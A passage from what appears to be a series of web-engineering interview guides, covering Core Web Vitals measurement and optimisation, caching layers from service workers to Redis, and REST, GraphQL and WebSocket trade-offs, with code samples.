│       │              │                  fully painted        │
│       │              │                                       │
│       │              └── FCP: First text painted            │
│       │                                                      │
│       └── TTFB: First byte received                         │
│                                                              │
│  What counts as LCP element:                                 │
│  ├── <img> elements                                         │
│  ├── <image> inside <svg>                                   │
│  ├── <video> poster image                                   │
│  ├── Background image via CSS url()                         │
│  └── Block-level text elements (<h1>, <p>, etc.)            │
└─────────────────────────────────────────────────────────────┘

Measuring LCP

// Using web-vitals library
import { onLCP } from 'web-vitals';

onLCP((metric) => {
  console.log('LCP:', metric.value);
  console.log('LCP Element:', metric.entries[0]?.element);
  console.log('Rating:', metric.rating);  // 'good', 'needs-improvement', 'poor'

  // Send to analytics
  sendToAnalytics({
    name: 'LCP',
    value: metric.value,
    id: metric.id,
    rating: metric.rating
  });
});

// Using PerformanceObserver directly
const observer = new PerformanceObserver((list) => {
  const entries = list.getEntries();
  const lastEntry = entries[entries.length - 1];

  console.log('LCP:', lastEntry.startTime);
  console.log('Element:', lastEntry.element);
});

observer.observe({ type: 'largest-contentful-paint', buffered: true });

Optimizing LCP

Cause	Solution
Slow server response	CDN, edge caching, optimize backend
Render-blocking resources	Inline critical CSS, defer JS
Slow resource load	Preload LCP image, use CDN
Client-side rendering	SSR/SSG for above-fold content

<!-- Preload the LCP image -->
<link rel="preload" as="image" href="/hero.jpg" fetchpriority="high">

<!-- For responsive images -->
<link rel="preload" as="image" href="/hero.jpg"
      imagesrcset="hero-400.jpg 400w, hero-800.jpg 800w"
      imagesizes="100vw">

<!-- Inline critical CSS -->
<style>
  .hero-image {
    width: 100%;
    height: auto;
    aspect-ratio: 16/9;
  }
</style>

<!-- Prioritize LCP image -->
<img src="hero.jpg" fetchpriority="high" alt="Hero">

3. INP (Interaction to Next Paint)

What It Measures

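INP observes the latency of every click, tap, and key press throughout the page lifecycle and reports a value close to the worst one: the single longest interaction on most pages, with one outlier ignored per 50 interactions on very interactive pages (roughly the 98th percentile).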

User clicks button
       │
       ▼
┌──────────────────┐
│  Input Delay     │  ← Time waiting in queue (main thread busy)
│  (event queued)  │
└────────┬─────────┘
         │
         ▼
┌──────────────────┐
│  Processing Time │  ← Event handler execution time
│  (handler runs)  │
└────────┬─────────┘
         │
         ▼
┌──────────────────┐
│  Presentation    │  ← Time for browser to paint the result
│  Delay           │
└────────┬─────────┘
         │
         ▼
    Next Paint

INP = Input Delay + Processing Time + Presentation Delay
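
The three phases can be read off a single Event Timing entry. This is a sketch using the standard startTime, processingStart, processingEnd, and duration fields; breakdownInteraction is a hypothetical helper, and a plain object stands in for a real PerformanceEventTiming entry.

```javascript
// Split one Event Timing entry into the three phases of an interaction.
function breakdownInteraction(entry) {
  const inputDelay = entry.processingStart - entry.startTime;
  const processingTime = entry.processingEnd - entry.processingStart;
  // duration runs from startTime to the next paint, so the remainder is presentation
  const presentationDelay = entry.startTime + entry.duration - entry.processingEnd;
  return { inputDelay, processingTime, presentationDelay };
}

// Plain object standing in for a PerformanceEventTiming entry (values in ms).
const sample = { startTime: 1000, processingStart: 1040, processingEnd: 1160, duration: 200 };
const phases = breakdownInteraction(sample);
```

Browsers coarsen duration for privacy reasons, so the presentation delay computed this way is approximate.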

Why INP Replaced FID

Metric	What It Measures	Problem
FID	Only FIRST interaction delay	Easy to game (fast initial load, slow later)
INP	ALL interactions, reports worst	Measures real user experience

Measuring INP

import { onINP } from 'web-vitals';

onINP((metric) => {
  console.log('INP:', metric.value);
  console.log('Rating:', metric.rating);

  // The interaction that caused the worst INP
  const entry = metric.entries[0];
  console.log('Interaction target:', entry.target);
  console.log('Interaction type:', entry.name);  // 'click', 'keydown', etc.
});

// Manual measurement with PerformanceObserver
const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    // entry.duration = total interaction time
    // entry.processingStart - entry.startTime = input delay
    // entry.processingEnd - entry.processingStart = processing time

    if (entry.duration > 200) {
      console.warn('Slow interaction:', {
        type: entry.name,
        duration: entry.duration,
        target: entry.target
      });
    }
  }
});

observer.observe({ type: 'event', buffered: true, durationThreshold: 16 });

Optimizing INP

// ❌ BAD - Long task blocks main thread
button.addEventListener('click', () => {
  // 200ms of synchronous work
  processLargeDataset(data);
  updateUI();
});

// ✅ GOOD - Yield to main thread
button.addEventListener('click', async () => {
  // Show immediate feedback
  button.classList.add('loading');

  // Yield control back to browser
  // scheduler.yield() is not available everywhere; fall back to a macrotask
  await (globalThis.scheduler?.yield?.() ?? new Promise(r => setTimeout(r, 0)));

  // Do heavy work
  processLargeDataset(data);
  updateUI();
});

// ✅ BETTER - Use Web Worker for heavy computation
const worker = new Worker('processor.js');

button.addEventListener('click', () => {
  button.classList.add('loading');
  worker.postMessage(data);
});

worker.onmessage = (e) => {
  updateUI(e.data);
  button.classList.remove('loading');
};

// ✅ Break up work with requestIdleCallback
function processInChunks(items, callback) {
  const queue = [...items];

  function processNext(deadline) {
    while (queue.length > 0 && deadline.timeRemaining() > 0) {
      const item = queue.shift();
      callback(item);
    }

    if (queue.length > 0) {
      requestIdleCallback(processNext);
    }
  }

  requestIdleCallback(processNext);
}

Cause	Solution
Long event handlers	Break into smaller tasks, yield
Heavy computation	Move to Web Worker
Large DOM updates	Virtual DOM, batch updates
Third-party scripts	Defer, facade pattern

4. CLS (Cumulative Layout Shift)

What It Measures

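CLS quantifies how much visible elements unexpectedly shift over the entire lifespan of the page, not only during load. The reported value is the largest burst of shifts (a session window of up to 5 seconds, closed by a 1-second gap).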

┌─────────────────────────────────────────────────────────────┐
│  Before Ad Loads              After Ad Loads                 │
│  ┌────────────────┐           ┌────────────────┐            │
│  │    Header      │           │    Header      │            │
│  ├────────────────┤           ├────────────────┤            │
│  │    Article     │           │      AD        │ ← Inserted │
│  │    Content     │           ├────────────────┤            │
│  │                │           │    Article     │ ← Shifted! │
│  │   [Button]     │           │    Content     │            │
│  └────────────────┘           │   [Button]     │ ← Misclick!│
│                               └────────────────┘            │
│                                                              │
│  CLS Score = Impact Fraction × Distance Fraction            │
│                                                              │
│  Impact: % of viewport affected                              │
│  Distance: How far elements moved (as % of viewport)         │
└─────────────────────────────────────────────────────────────┘

The CLS Formula

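Layout Shift Score = Impact Fraction × Distance Fraction

Impact Fraction = (Union of the shifted elements' visible area before and after the shift) / (Viewport area)
Distance Fraction = (Max distance any element moved) / (Larger of viewport width and height)

Example (portrait viewport, so height is the larger dimension):
- Element covers 50% of the viewport and moves down by 25% of the viewport height
- Before and after positions together cover 75% of the viewport (impact = 0.75)
- Distance fraction = 0.25
- Score = 0.75 × 0.25 = 0.1875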

Measuring CLS

import { onCLS } from 'web-vitals';

onCLS((metric) => {
  console.log('CLS:', metric.value);
  console.log('Shifts:', metric.entries.length);

  // Identify culprit elements
  metric.entries.forEach(entry => {
    entry.sources?.forEach(source => {
      console.log('Shifted element:', source.node);
    });
  });
});

// Using PerformanceObserver
let clsValue = 0;
let clsEntries = [];

const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    // Only count unexpected shifts (not from user input)
    if (!entry.hadRecentInput) {
      clsValue += entry.value;
      clsEntries.push(entry);
    }
  }
});

observer.observe({ type: 'layout-shift', buffered: true });
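
The observer above keeps a running total of every shift. The CLS value reported by web-vitals and CrUX instead takes the worst "session window": shifts are grouped while they are less than 1 second apart and the group spans less than 5 seconds. A sketch of that grouping follows, where computeCls is a hypothetical name and the entries are assumed to arrive in chronological order.

```javascript
// Sketch: CLS as the largest session window of layout shifts.
// A window closes after a 1 s gap between shifts or once it spans 5 s.
function computeCls(entries) {
  let maxWindow = 0;
  let current = 0;
  let windowStart = 0;
  let previousTime = 0;

  for (const entry of entries) {
    if (entry.hadRecentInput) continue; // shifts right after user input are expected

    const startsNewWindow =
      current === 0 ||
      entry.startTime - previousTime >= 1000 ||
      entry.startTime - windowStart >= 5000;

    if (startsNewWindow) {
      current = entry.value;
      windowStart = entry.startTime;
    } else {
      current += entry.value;
    }
    previousTime = entry.startTime;
    maxWindow = Math.max(maxWindow, current);
  }
  return maxWindow;
}
```

With the observer above you would call computeCls(clsEntries) whenever you are ready to report, for example when the page is being hidden.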

Optimizing CLS

<!-- ✅ Reserve space for images with aspect-ratio -->
<img
  src="photo.jpg"
  width="800"
  height="600"
  style="aspect-ratio: 4/3; width: 100%; height: auto;"
  alt="Photo"
>

<!-- ✅ Reserve space for ads -->
<div class="ad-container" style="min-height: 250px;">
  <!-- Ad loads here -->
</div>

/* ✅ Prevent font swap layout shift */
@font-face {
  font-family: 'CustomFont';
  src: url('font.woff2') format('woff2');
  font-display: optional;  /* or 'swap' with size-adjust */
  size-adjust: 100.5%;     /* Match fallback metrics */
}

/* ✅ Use transform for animations (doesn't cause layout shift) */
.animate {
  transform: translateY(-10px);  /* Good */
}

.animate-bad {
  margin-top: -10px;  /* Bad - causes layout shift */
}

Cause	Solution
Images without dimensions	Always set width/height or aspect-ratio
Ads/embeds without reserved space	Use min-height containers
Dynamically injected content	Insert below fold or reserve space
Web fonts causing FOUT	font-display: optional, or size-adjust
Animations using layout properties	Use transform instead

5. Additional Metrics

TTFB (Time to First Byte)

const navigation = performance.getEntriesByType('navigation')[0];
const ttfb = navigation.responseStart;  // measured from navigation start: includes redirects, DNS, connection setup, and server time

// Good: < 800ms
// Needs improvement: 800-1800ms
// Poor: > 1800ms

FCP (First Contentful Paint)

import { onFCP } from 'web-vitals';

onFCP((metric) => {
  console.log('FCP:', metric.value);
  // Good: < 1.8s
});

Long Tasks

// Detect tasks blocking main thread > 50ms
const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    console.warn(`Long task: ${entry.duration}ms`);

    // Get attribution if available
    if (entry.attribution) {
      console.log('Script:', entry.attribution[0]?.name);
    }
  }
});

observer.observe({ type: 'longtask', buffered: true });

6. Complete Measurement Setup

import { onLCP, onINP, onCLS, onFCP, onTTFB } from 'web-vitals';

function sendToAnalytics(metric) {
  const body = JSON.stringify({
    name: metric.name,
    value: metric.value,
    rating: metric.rating,
    delta: metric.delta,
    id: metric.id,
    navigationType: metric.navigationType,
    // Include page context
    url: window.location.href,
    userAgent: navigator.userAgent,
    connection: navigator.connection?.effectiveType,
    deviceMemory: navigator.deviceMemory
  });

  // Use sendBeacon for reliability (survives page unload)
  if (navigator.sendBeacon) {
    navigator.sendBeacon('/analytics/vitals', body);
  } else {
    fetch('/analytics/vitals', {
      body,
      method: 'POST',
      keepalive: true
    });
  }
}

// Register all Core Web Vitals
onLCP(sendToAnalytics);
onINP(sendToAnalytics);
onCLS(sendToAnalytics);

// Additional helpful metrics
onFCP(sendToAnalytics);
onTTFB(sendToAnalytics);

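// Optional: register sendOnce in place of sendToAnalytics to report each metric only once per page.
// Trade-off: later updates are dropped (CLS and INP can be reported again with a larger value).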
const reported = new Set();
function sendOnce(metric) {
  if (!reported.has(metric.name)) {
    reported.add(metric.name);
    sendToAnalytics(metric);
  }
}

7. Debugging in DevTools

Chrome DevTools Performance Panel

1. Open DevTools → Performance tab
2. Check "Web Vitals" checkbox
3. Click Record, interact with page
4. Stop recording
5. Look for:
   - LCP marker on timeline
   - Layout Shift events (red bars)
   - Long Tasks (gray bars > 50ms)

Lighthouse

1. Open DevTools → Lighthouse tab
2. Select "Performance" category
3. Generate report
4. Check:
   - Core Web Vitals scores
   - "Opportunities" for improvements
   - "Diagnostics" for detailed issues

Web Vitals Extension

Chrome Extension: "Web Vitals"
- Shows real-time CWV scores
- Green/Yellow/Red indicators
- Click for detailed breakdown

8. Lab vs Field Data

Data Type	Source	Use Case
Lab	Lighthouse, DevTools	Development, debugging
Field	CrUX, RUM	Real user experience

┌─────────────────────────────────────────────────────────────┐
│  WHY THEY DIFFER                                             │
│                                                              │
│  Lab Data:                                                   │
│  - Simulated device/network                                  │
│  - No real user interaction                                  │
│  - Consistent, reproducible                                  │
│                                                              │
│  Field Data:                                                 │
│  - Real devices (slow phones!)                              │
│  - Real networks (3G in India!)                             │
│  - Real user behavior                                        │
│                                                              │
│  Field data is what Google uses for rankings!                │
└─────────────────────────────────────────────────────────────┘

Chrome User Experience Report (CrUX)

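// Query CrUX API (API_KEY is your own Google API key; run inside an async function or ES module)
const response = await fetch(
  `https://chromeuxreport.googleapis.com/v1/records:queryRecord?key=${API_KEY}`,
  {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },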
    body: JSON.stringify({
      url: 'https://example.com',
      metrics: ['largest_contentful_paint', 'interaction_to_next_paint', 'cumulative_layout_shift']
    })
  }
);

const data = await response.json();
console.log('P75 LCP:', data.record.metrics.largest_contentful_paint.percentiles.p75);
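
CrUX reports the 75th percentile. For your own RUM samples the same statistic can be computed server-side; this is a minimal sketch using the nearest-rank method (percentile is a hypothetical helper, and the sample values are made up for illustration).

```javascript
// Nearest-rank percentile over raw RUM samples (values in ms).
function percentile(samples, p) {
  if (samples.length === 0) return undefined;
  const sorted = [...samples].sort((a, b) => a - b); // numeric sort, input untouched
  const rank = Math.ceil((p / 100) * sorted.length);
  return sorted[Math.max(rank, 1) - 1];
}

// Illustrative LCP samples, not real measurements.
const lcpSamples = [1200, 1800, 2100, 2600, 3900, 1500, 2300, 4100];
const p75 = percentile(lcpSamples, 75);
```

Averages hide the slow tail, which is why the percentile is tracked instead of the mean.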

9. Quick Reference

Metric	Good	Needs Work	Poor	Primary Cause
LCP	< 2.5s	2.5-4s	> 4s	Slow resource load
INP	< 200ms	200-500ms	> 500ms	Long tasks
CLS	< 0.1	0.1-0.25	> 0.25	Dynamic content
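
The thresholds in this table translate directly into a rating function, for example to label RUM samples on the backend. This is a sketch: rateMetric is a hypothetical name, and values exactly on a boundary are assumed to fall into the better bucket.

```javascript
// Thresholds from the table above: [good upper bound, poor lower bound].
const THRESHOLDS = {
  LCP: [2500, 4000], // ms
  INP: [200, 500],   // ms
  CLS: [0.1, 0.25],  // unitless
};

function rateMetric(name, value) {
  const [good, poor] = THRESHOLDS[name];
  if (value <= good) return 'good';
  if (value <= poor) return 'needs-improvement';
  return 'poor';
}
```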

Optimization Cheat Sheet

Metric	Quick Wins
LCP	Preload hero image, inline critical CSS, CDN
INP	Break long tasks, use Web Workers, debounce
CLS	Set image dimensions, reserve ad space, use transform

10. Interview Tip

"I measure Core Web Vitals using the web-vitals library and send data to our analytics backend using sendBeacon for reliability. For LCP, I preload the hero image and inline critical CSS. For INP, I profile with DevTools to find long tasks and break them up using yield points or move heavy computation to Web Workers. For CLS, I ensure all images have explicit dimensions and reserve space for dynamic content like ads. I distinguish between lab and field data—Lighthouse is for debugging, but CrUX/RUM reflects real user experience and is what Google uses for rankings. We track P75 values and set alerts when they degrade."

Caching Strategies: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:24:03 +0000

A comprehensive guide to caching at every layer — from browser to CDN to database — for system design interviews.

1. Client-Side: The "Edge of the Edge"

At a senior level, client-side caching isn't just about localStorage; it's about interception and background synchronization.

Service Workers (The Programmable Proxy)

Service Workers live between the browser and the network, allowing you to implement complex caching logic.

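// Stale-While-Revalidate pattern
self.addEventListener('fetch', (event) => {
  // The Cache API only stores GET requests; let everything else hit the network
  if (event.request.method !== 'GET') return;

  event.respondWith(
    caches.open('v1').then(async (cache) => {
      const cachedResponse = await cache.match(event.request);

      // Fetch fresh data in background and refresh the cache on success
      const fetchPromise = fetch(event.request).then((response) => {
        if (response.ok) cache.put(event.request, response.clone());
        return response;
      });

      if (cachedResponse) {
        // Keep the worker alive until the background update settles
        event.waitUntil(fetchPromise.catch(() => {}));
        return cachedResponse;
      }

      // Nothing cached yet: wait for the network
      return fetchPromise;
    })
  );
});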

Strategy by Request Type

Use request.destination to apply different strategies:

Destination	Strategy	Example
`font`	Cache-Only	Self-hosted web fonts precached at install (never change)
`image`	Cache-First	Product images, logos
`document`	Network-First	HTML pages (need fresh content)
`""` (empty: fetch/XHR calls)	Network-First	Real-time stock/API data
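A minimal sketch of that routing, written as a pure lookup so it can run outside a Service Worker. `strategyFor` and the strategy names are hypothetical; note that requests made with fetch() or XHR report an empty-string destination.

```javascript
// Map Request.destination values to the strategy names from the table.
// fetch()/XHR calls report an empty-string destination.
const STRATEGY_BY_DESTINATION = {
  font: 'cache-only',
  image: 'cache-first',
  document: 'network-first',
  '': 'network-first',
};

// Pick a strategy, falling back to network-first for anything unlisted.
function strategyFor(destination) {
  return STRATEGY_BY_DESTINATION[destination] ?? 'network-first';
}

console.log(strategyFor('image'));
```

Inside a fetch handler this would be called as `strategyFor(event.request.destination)` before deciding whether to consult the cache or the network first.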

Browser HTTP Cache

Controlled by Cache-Control headers.

Fingerprinting Strategy:

# Immutable assets with hash in filename
main.a4f2b3c.js  →  Cache-Control: max-age=31536000, immutable

# HTML files (need revalidation)
index.html      →  Cache-Control: no-cache

Result: Users only download core platform logic once per release.
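One way to apply this rule on the server is to detect the fingerprint in the filename. This is a sketch under assumptions: the hash is at least 7 hex characters between two dots, and `cacheControlFor` is a hypothetical helper, not part of any framework.

```javascript
// Matches a hex content hash between dots, e.g. "main.a4f2b3c.js".
const FINGERPRINT = /\.[0-9a-f]{7,}\.(js|css|woff2|png|jpg|svg)$/i;

// Fingerprinted assets can be cached for a year; everything else revalidates.
function cacheControlFor(path) {
  if (FINGERPRINT.test(path)) {
    return 'max-age=31536000, immutable';
  }
  return 'no-cache';
}

console.log(cacheControlFor('main.a4f2b3c.js'));
console.log(cacheControlFor('index.html'));
```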

2. Networking & Infrastructure Layers

This is where you manage the "Thundering Herd" problem and geographical latency.

The Caching Hierarchy

┌─────────────────────────────────────────────────────────────┐
│  Service Worker Cache                                       │
│  └─▶ Browser HTTP Cache                                     │
│      └─▶ Forward Proxy (ISP/Corporate)                      │
│          └─▶ CDN Edge (Cloudflare, Akamai)                  │
│              └─▶ Reverse Proxy (Nginx/Varnish)              │
│                  └─▶ Application Cache (Redis)              │
│                      └─▶ Database                           │
└─────────────────────────────────────────────────────────────┘

Forward Proxy Cache (ISP/Corporate Layer)

Caches requests made by users behind a firewall.

The Trap: You have zero control here. If you don't use fingerprinted filenames, a corporate proxy might serve an old version of your React app for weeks.

Fix: Always use content-hashed filenames for static assets.

Reverse Proxy Cache (Gateway Layer)

Your Nginx/Varnish fleet sitting in front of application servers.

Micro-caching Pattern:

# Cache for just 1 second
proxy_cache_valid 200 1s;
# Let only one request per key go upstream on a miss
proxy_cache_lock on;

For viral real-time endpoints (trending news feed), this can collapse 10,000 simultaneous requests into a single origin hit per second, protecting your backend.
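The effect is easy to see in a toy model. The sketch below wraps a hypothetical origin function with a 1-second TTL cache and an injectable clock; it is synchronous, so it illustrates the TTL behavior only and does not model coalescing of truly concurrent misses.

```javascript
// Wrap an origin function with a tiny TTL cache (sketch of micro-caching).
// `now` is injectable so the behavior can be checked without real timers.
function microCache(fetchOrigin, ttlMs, now = Date.now) {
  const entries = new Map(); // key -> { value, expiresAt }
  return function get(key) {
    const hit = entries.get(key);
    if (hit && hit.expiresAt > now()) return hit.value;
    const value = fetchOrigin(key);
    entries.set(key, { value, expiresAt: now() + ttlMs });
    return value;
  };
}

let originHits = 0;
let clock = 0; // fake time in ms
const getFeed = microCache((key) => {
  originHits += 1;
  return `feed for ${key}`;
}, 1000, () => clock);

for (let i = 0; i < 10000; i++) getFeed('/trending');
console.log(originHits); // 1

clock = 1500; // the entry has expired
getFeed('/trending');
console.log(originHits); // 2
```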

CDN (Edge Caching)

Dynamic Content with ESI (Edge Side Includes)

Assemble pages where some parts are cached longer than others:

<!-- Header cached globally for 24 hours -->
<esi:include src="/fragments/header" />

<!-- User profile fetched dynamically per-request -->
<esi:include src="/fragments/user-profile" />

<!-- Footer cached globally for 24 hours -->
<esi:include src="/fragments/footer" />

Surrogate Keys (Smart Purging)

Instead of purging URLs one by one, tag your assets:

Cache-Tag: product-123, category-electronics

When the product price changes, send one "Purge by Tag" command to clear every related asset globally.
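Under the hood, tag-based purging needs a reverse index from tag to cached URLs. A minimal in-memory sketch, assuming a single node and a hypothetical `TaggedCache` class (real CDNs distribute this index across edges):

```javascript
class TaggedCache {
  constructor() {
    this.responses = new Map(); // url -> cached body
    this.urlsByTag = new Map(); // tag -> Set of urls carrying that tag
  }

  put(url, body, tags) {
    this.responses.set(url, body);
    for (const tag of tags) {
      if (!this.urlsByTag.has(tag)) this.urlsByTag.set(tag, new Set());
      this.urlsByTag.get(tag).add(url);
    }
  }

  // Remove every cached response that carries the tag; returns how many were removed.
  purgeByTag(tag) {
    let purged = 0;
    for (const url of this.urlsByTag.get(tag) ?? []) {
      if (this.responses.delete(url)) purged += 1;
    }
    this.urlsByTag.delete(tag);
    return purged;
  }
}

const edge = new TaggedCache();
edge.put('/products/123', '<html>...', ['product-123', 'category-electronics']);
edge.put('/api/products/123', '{"price": 10}', ['product-123']);
edge.put('/categories/electronics', '<html>...', ['category-electronics']);
console.log(edge.purgeByTag('product-123'));
```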

3. Application & Data Layers

Redis vs. Memcached

Feature	Redis	Memcached
Data Structures	Lists, Sets, Hashes, Sorted Sets	Key-Value only
Persistence	Yes (RDB/AOF)	No
Pub/Sub	Yes	No
Threading	Single-threaded command execution (optional I/O threads since 6.0)	Multi-threaded
Use Case	Complex state, real-time leaderboards	High-throughput simple caching

When to use Redis:

Sorted Set for real-time leaderboard
Pub/Sub to invalidate local caches across 100 app servers
Session storage with TTL

When to use Memcached:

Pure object caching
Maximum throughput for simple key-value lookups

ElastiCache (AWS Managed)

Provides Redis/Memcached with:

Automatic sharding
High availability
Multi-AZ replication

4. Cache Consistency Patterns

Pattern	How It Works	Trade-off
Cache-Aside	App checks cache first, fetches from DB on miss, writes to cache	Simple but risk of stale data
Write-Through	Write to cache AND DB simultaneously	Consistent but slower writes
Write-Behind	Write to cache immediately, flush to DB async	Fast writes but risk of data loss
Read-Through	Cache fetches from DB on miss automatically	Simpler app code
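Cache-Aside is the pattern most application code ends up writing by hand. A minimal sketch, with plain `Map` objects standing in for Redis and the database; `createCacheAside` is a hypothetical helper, and invalidating on write (rather than updating the cache) is one common choice, not the only one.

```javascript
function createCacheAside(cache, db) {
  return {
    read(key) {
      if (cache.has(key)) return cache.get(key); // hit
      const value = db.get(key); // miss: go to the database
      if (value !== undefined) cache.set(key, value);
      return value;
    },
    write(key, value) {
      db.set(key, value); // database is the source of truth
      cache.delete(key); // invalidate so the next read repopulates
    },
  };
}

const db = new Map([['user:1', 'John']]);
const cache = new Map();
const users = createCacheAside(cache, db);

console.log(users.read('user:1')); // served from db, then cached
users.write('user:1', 'Jane');
console.log(users.read('user:1')); // repopulated after invalidation
```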

Write-Behind Example (View Counters)

// Increment in Redis immediately (fast)
await redis.incr(`views:article:${id}`);

// Background job flushes to DB every 5 minutes
// Risk: Data loss if Redis fails before flush
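The flush half of the pattern can be sketched the same way. Here a `Map` of pending deltas stands in for Redis and another `Map` stands in for the database; `ViewCounter` is a hypothetical name, and a real job would call `flush()` on a timer.

```javascript
class ViewCounter {
  constructor(db) {
    this.db = db; // stand-in for the durable store
    this.pending = new Map(); // articleId -> increments not yet flushed
  }

  // Fast path: only touch the in-memory buffer.
  increment(articleId) {
    this.pending.set(articleId, (this.pending.get(articleId) ?? 0) + 1);
  }

  // Background path: apply buffered deltas to the database, then clear them.
  flush() {
    for (const [id, delta] of this.pending) {
      this.db.set(id, (this.db.get(id) ?? 0) + delta);
    }
    const flushed = this.pending.size;
    this.pending.clear();
    return flushed;
  }
}

const viewsDb = new Map([['article-1', 100]]);
const counter = new ViewCounter(viewsDb);
counter.increment('article-1');
counter.increment('article-1');
counter.increment('article-2');
console.log(counter.flush(), viewsDb.get('article-1'));
```

Anything still sitting in `pending` when the process dies is lost, which is the data-loss risk the pattern accepts.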

5. Special Case: Video Streaming (HLS/DASH)

Streaming requires a "binary-first" caching mindset.

Different TTLs for Different Files

File Type	Purpose	TTL
`.m3u8` / `.mpd` (Manifest)	"Map" of the stream	1-2 seconds
`.ts` / `.m4s` (Segments)	Actual video chunks	Long-term (immutable)

Why Manifests Need Short TTL

#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:6.0,
segment001.ts    ← Already cached at edge
segment002.ts    ← Already cached at edge
segment003.ts    ← NEW! User needs to see this

If manifest is cached too long, users fall behind the live edge.

Low-Latency HLS (LL-HLS)

Uses Blocking Playlist Reload:

1. Client requests manifest
2. CDN sees next segment isn't ready yet
3. CDN HOLDS the request open (doesn't return 404)
4. When segment is ready, CDN returns updated manifest

CDN Config Required: Must support "holding" requests, not immediately returning stale/404.

6. Quick Reference: Cache Headers

Header	Purpose	Example
`Cache-Control`	Main caching directive	`max-age=3600, public`
`ETag`	Content fingerprint for validation	`"abc123"`
`Last-Modified`	Timestamp-based validation	`Mon, 21 Oct 2024 07:28:00 GMT`
`Vary`	Cache separately by header	`Accept-Encoding`
`Surrogate-Control`	CDN-specific directives	`max-age=86400`
`Cache-Tag`	For tag-based purging	`product-123`

7. Interview Tip

"Caching is about trade-offs between freshness and speed. I use fingerprinted assets with immutable caching for static files, short TTLs with stale-while-revalidate for API data, and micro-caching at the reverse proxy to handle thundering herds. For complex invalidation, I use surrogate keys to purge by tag rather than URL. At the data layer, I choose Redis for complex structures and Pub/Sub invalidation, Memcached for pure throughput."

Network Protocols: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:03:27 +0000


A comprehensive guide to REST, GraphQL, WebSockets, and SSE for system design interviews.

1. REST (Representational State Transfer)

REST is the foundation of most web communication, built on the stateless nature of HTTP.

Transport Mechanism

Operates primarily over HTTP/1.1 or HTTP/2:

Version	Behavior
HTTP/1.1	Persistent connections by default, but each connection handles one request at a time, so browsers open several in parallel
HTTP/2	Multiplexes multiple requests over a single connection to reduce latency

The "Over-fetching" Problem

A major architectural drawback of REST is that endpoints return a fixed data structure.

GET /users/1

// You only need the name, but you get everything:
{
  "id": 1,
  "name": "John",
  "email": "john@example.com",
  "address": { ... },
  "orderHistory": [ ... ],  // 50KB of data you don't need
  "preferences": { ... }
}

Result: Wasting bandwidth and browser memory.

Caching Strategy (REST's Superpower)

REST is uniquely powerful because it leverages standard HTTP caching headers:

Header	Purpose
`ETag`	Content fingerprint for conditional requests
`Cache-Control`	Tells browser/CDN how long to cache
`Last-Modified`	Timestamp-based cache validation

Browsers and CDNs can natively cache REST responses, significantly reducing server load for static or semi-static data.
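The conditional-request flow behind `ETag` can be sketched as a pure function. Assumptions: request header names arrive lowercased, `respond` is a hypothetical handler, and the tiny FNV-1a hash only stands in for a real content hash.

```javascript
// Tiny FNV-1a hash, standing in for a real content hash such as SHA-256.
function fnv1a(text) {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193) >>> 0;
  }
  return hash.toString(16);
}

// Return 304 with no body when the client's copy is still current.
function respond(requestHeaders, body) {
  const etag = `"${fnv1a(body)}"`;
  const headers = { ETag: etag, 'Cache-Control': 'no-cache' };
  if (requestHeaders['if-none-match'] === etag) {
    return { status: 304, headers, body: null };
  }
  return { status: 200, headers, body };
}

const first = respond({}, '{"name":"John"}');
const second = respond({ 'if-none-match': first.headers.ETag }, '{"name":"John"}');
console.log(first.status, second.status);
```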

2. GraphQL

GraphQL is a query language for APIs that provides a complete and understandable description of the data in your API.

The "Under-fetching" Solution

Unlike REST, which might require three separate calls to get a user, their posts, and their followers, GraphQL fetches all of this in a single round trip.

# One request, all the data you need
query {
  user(id: 1) {
    name
    posts {
      title
    }
    followers {
      name
    }
  }
}

Critical for mobile: High latency on cellular networks makes multiple round trips expensive.

Schema & Type Safety

GraphQL uses a strongly typed schema:

type User {
  id: ID!
  name: String!
  email: String!
  posts: [Post!]!
}

Benefit: Tools like GraphQL Code Generator automatically create TypeScript interfaces, ensuring the frontend never attempts to access a field that doesn't exist.

Architectural Cost

Because GraphQL often uses POST requests for all queries, native browser caching is much harder.

Solutions:

Apollo Client - Sophisticated in-memory cache with normalized data
Relay - Facebook's production-grade caching layer
Persisted Queries - Hash queries to enable GET requests and CDN caching

3. WebSockets (WS)

WebSockets provide a persistent, full-duplex (two-way) communication channel between client and server.

The Handshake

1. Client sends HTTP request with "Upgrade: websocket" header
2. Server responds with "101 Switching Protocols"
3. Protocol switches from HTTP to Binary/Frame-based communication
4. Connection stays open for bidirectional messaging

Framing and Overhead

Protocol	Header Size per Message
HTTP	~800 bytes (cookies, user-agents, etc.)
WebSocket	2-14 bytes (after handshake; client frames include a 4-byte mask)

Result: Most efficient protocol for high-frequency data:

Cursor positions in collaborative docs (Google Docs)
Rapid price updates (Trading platforms)
Multiplayer game state
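The per-frame overhead follows directly from the RFC 6455 frame layout: 2 base bytes, an extended length field for larger payloads, and a 4-byte masking key on client-to-server frames. A small sketch (`wsFrameHeaderBytes` is a hypothetical helper):

```javascript
// Header size in bytes for a single WebSocket frame (RFC 6455 layout).
function wsFrameHeaderBytes(payloadLength, masked) {
  let bytes = 2; // FIN/opcode byte + mask bit/7-bit length byte
  if (payloadLength > 65535) bytes += 8; // 64-bit extended length
  else if (payloadLength > 125) bytes += 2; // 16-bit extended length
  if (masked) bytes += 4; // masking key, required on client frames
  return bytes;
}

console.log(wsFrameHeaderBytes(20, false)); // small server push
console.log(wsFrameHeaderBytes(70000, true)); // large client upload
```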

State Management Challenge

Since the connection is persistent, the server must keep a record of every connected client in memory.

Problem: Horizontal scaling is difficult.

Solution: Use a Pub/Sub layer (like Redis) to sync messages across multiple server instances.

┌──────────┐     ┌──────────┐     ┌──────────┐
│ Server 1 │────▶│  Redis   │◀────│ Server 2 │
│ (1000    │     │  Pub/Sub │     │ (1000    │
│  clients)│     └──────────┘     │  clients)│
└──────────┘                      └──────────┘
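The diagram can be simulated in a few lines. In this sketch an in-process `Broker` stands in for Redis Pub/Sub, arrays stand in for open sockets, and the channel name `room:general` is made up.

```javascript
class Broker {
  constructor() {
    this.handlers = new Map(); // channel -> subscriber callbacks
  }
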